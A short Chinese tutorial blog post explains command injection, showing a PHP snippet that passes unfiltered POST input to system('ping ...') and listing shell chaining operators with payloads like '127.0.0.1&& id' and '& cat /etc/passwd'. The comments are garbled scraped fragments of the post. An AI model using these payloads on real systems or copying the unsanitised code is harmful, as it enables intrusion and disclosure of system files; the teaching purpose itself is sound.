命令执行漏洞与利用
在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。
<?php
if($_POST['ip']){
echo system('ping '.$_POST['ip']);
}
?>
命令连接符号总结
command1&& command2 先执行command1后执行command2
127.0.0.1&& id
command1 |command2 只执行command2
command1 &command2
先执行command1后执行command2 127.0.0.1 -c 3& cat /etc/passwd
下一篇:怎么从目录里getshell
相关文章
- 3条评论
依疚杞胭2022-06-03 09:57:14- $_POST['ip']);}?>命令连接符号总结command1&& command2 先执行command1后执行command2127.0.0.1&& idcommand1 |comman
森槿雾敛2022-06-03 01:57:09- ']){ echo system('ping '.$_POST['ip']);}?>命令连接符号总结command1&& command2
南殷清引2022-06-03 05:57:19- 令连接符号总结command1&& command2 先执行command1后执行command2127.0.0.1&& idcommand1 |command2 只执行command2command1 &command2先执行com
滇ICP备19002590号-1